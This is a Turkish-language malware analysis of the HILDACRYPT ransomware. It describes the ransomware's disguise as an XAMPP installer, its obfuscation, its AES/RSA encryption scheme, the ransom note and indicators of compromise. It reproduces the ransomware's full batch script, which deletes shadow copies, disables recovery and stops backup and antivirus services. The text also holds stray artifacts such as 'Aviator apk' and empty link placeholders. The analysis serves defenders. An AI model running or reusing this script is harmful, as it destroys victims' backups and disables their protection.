Merhaba Habr! Bir kez daha Fidye Yazılımı kategorisindeki kötü amaçlı yazılımların en son sürümlerinden bahsediyoruz. HILDACRYPT, Hilda ailesinin bir üyesi olan ve Ağustos 2019'da keşfedilen, adını yazılımı dağıtmak için kullanılan Netflix çizgi filminden alan yeni bir fidye yazılımıdır. Bugün bu güncellenmiş fidye yazılımı virüsünün teknik özellikleriyle tanışıyoruz.
Hilda fidye yazılımının ilk sürümünde Youtube'da yayınlanan bir bağlantı bulunuyor. Fidye mektubunda çizgi film serisi yer alıyordu. HILDACRYPT, MariaDB, PHP ve Perl içeren, kurulumu kolay bir Apache dağıtımı olan meşru bir XAMPP yükleyicisi gibi görünür. Aynı zamanda, cryptolocker'ın farklı bir dosya adı vardır - xamp. Ayrıca fidye yazılımı dosyasının elektronik imzası yoktur.
Statik analiz
Fidye yazılımı, Microsoft için yazılmış bir PE32 .NET dosyasında yer almaktadır. WindowsDosya boyutu 135.168 bayttır. Hem ana program kodu hem de savunma kodu C# dilinde yazılmıştır. Derleme tarih ve saat damgasına göre, ikili dosya 14 Eylül 2019 tarihinde oluşturulmuştur.
Detect It Easy'ye göre, fidye yazılımı Confuser ve ConfuserEx kullanılarak arşivleniyor, ancak bu obfuscator'lar öncekiyle aynı, yalnızca ConfuserEx Confuser'ın halefi olduğundan kod imzaları benzer.
HILDACRYPT aslında ConfuserEx ile paketlenmiştir.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Saldırı vektörü
Büyük ihtimalle fidye yazılımı, meşru bir XAMPP programı görünümüne bürünen web programlama sitelerinden birinde keşfedildi.
Enfeksiyon zincirinin tamamı şurada görülebilir: .
Şaşırtma
Fidye yazılımı dizeleri şifrelenmiş biçimde saklanır. HILDACRYPT başlatıldığında Base64 ve AES-256-CBC'yi kullanarak bunların şifresini çözer.
Montaj
Öncelikle fidye yazılımı %AppDataRoaming% içerisinde GUID (Globally Unique Identifier) parametresinin rastgele oluşturulduğu bir klasör oluşturuyor. Fidye yazılımı virüsü bu konuma bir yarasa dosyası ekleyerek dosyayı cmd.exe kullanarak başlatır:
cmd.exe /c JKfgkgj3hjgfhjka.bat ve çık
Daha sonra sistem özelliklerini veya hizmetlerini devre dışı bırakmak için bir toplu komut dosyası çalıştırmaya başlar.
Komut dosyası, gölge kopyaları yok eden, SQL sunucusunu, yedekleme ve antivirüs çözümlerini devre dışı bırakan uzun bir komut listesi içerir.
Örneğin Acronis Backup hizmetlerini durdurma girişimi başarısızlıkla sonuçlanıyor. Ayrıca şu satıcıların yedekleme sistemlerine ve antivirüs çözümlerine de saldırır: Veeam, Sophos, Kaspersky, McAfee ve diğerleri.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Yukarıda belirtilen hizmetler ve işlemler devre dışı bırakıldığında, cryptolocker, gerekli tüm hizmetlerin kapalı olduğundan emin olmak için görev listesi komutunu kullanarak çalışan tüm işlemler hakkında bilgi toplar.
görev listesi v/fo csv
Bu komut, öğeleri "" işaretiyle ayrılmış, çalışan işlemlerin ayrıntılı bir listesini görüntüler.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Bu kontrolün ardından fidye yazılımı şifreleme işlemine başlıyor.
Шифрование
Dosya şifreleme
HILDACRYPT, Recycle.Bin ve Reference AssembliesMicrosoft klasörleri dışında sabit disklerde bulunan tüm içerikleri inceler. İkincisi, fidye yazılımının çalışmasını etkileyebilecek .Net uygulamaları için kritik dll, pdb vb. dosyaları içerir. Şifrelenecek dosyaları aramak için aşağıdaki uzantı listesi kullanılır:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Fidye yazılımı, kullanıcı dosyalarını şifrelemek için AES-256-CBC algoritmasını kullanır. Anahtar boyutu 256 bit ve başlatma vektörü (IV) boyutu 16 bayttır.
Aşağıdaki ekran görüntüsünde byte_2 ve byte_1 değerleri GetBytes() kullanılarak rastgele elde edilmiştir.
Anahtar
WI
Şifrelenmiş dosyanın uzantısı HCY!.. Bu şifrelenmiş dosyaya bir örnektir. Yukarıda bahsedilen anahtar ve IV bu dosya için oluşturulmuştur.
Anahtar şifreleme
Cryptolocker, oluşturulan AES anahtarını şifrelenmiş bir dosyada saklar. Şifrelenmiş dosyanın ilk kısmı, XML formatında HILDACRYPT, KEY, IV, FileLen gibi verileri içeren bir başlığa sahiptir ve şuna benzer:
AES ve IV anahtar şifrelemesi RSA-2048 kullanılarak, kodlama ise Base64 kullanılarak yapılır. RSA genel anahtarı, kripto kilitleyicinin gövdesinde XML formatında şifrelenmiş dizelerden birinde saklanır.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES dosya anahtarını şifrelemek için bir RSA ortak anahtarı kullanılır. RSA genel anahtarı Base64 ile kodlanmıştır ve 65537'lik bir modül ve genel üssünden oluşur. Şifre çözme, saldırganın sahip olduğu RSA özel anahtarını gerektirir.
RSA şifrelemesinden sonra AES anahtarı, şifrelenmiş dosyada saklanan Base64 kullanılarak kodlanır.
Fidye mesajı
Şifreleme tamamlandıktan sonra HILDACRYPT, html dosyasını, dosyaları şifrelediği klasöre yazar. Fidye yazılımı bildirimi, kurbanın saldırganla iletişim kurabileceği iki e-posta adresi içerir.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
Şantaj bildiriminde aynı zamanda Japonya'da yasaklanan küçük kız görünümündeki anime ve manga karakterlerine gönderme yapan "Hiçbir loli güvenli değildir ;)" cümlesi de yer alıyor.
Aviator apk
Yeni fidye yazılımı ailesi HILDACRYPT, yeni sürümünü yayınladı. Şifreleme modeli, kurbanın fidye yazılımı tarafından şifrelenen dosyaların şifresini çözmesini engeller. Cryptolocker, yedekleme sistemleri ve antivirüs çözümleriyle ilgili koruma hizmetlerini devre dışı bırakmak için aktif koruma yöntemlerini kullanır. HILDACRYPT'in yazarı, Netflix'te gösterilen ve programın önceki sürümünün satın alma mektubunda fragmanının bağlantısı bulunan animasyon dizisi Hilda'nın hayranıdır.
Her zamanki gibi и bilgisayarınızı HILDACRYPT fidye yazılımından koruyabilir ve sağlayıcılar da müşterilerini koruma olanağına sahiptir. . Bu çözümlerin aşağıdakileri içermesi sayesinde koruma sağlanır: yalnızca yedeklemeyi değil aynı zamanda entegre güvenlik sistemimizi de içerir - Makine öğrenimi modeliyle desteklenen ve davranışsal buluşsal yöntemlere dayanan, sıfır gün fidye yazılımı tehdidine eşi benzeri olmayan bir şekilde karşı koyabilen bir teknoloji.
Uzlaşma göstergeleri
Dosya uzantısı HCY!
HILDACRYPTReadMe.html
Tek harf "p" içeren ve dijital imza içermeyen xamp.exe
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Kaynak: habr.com
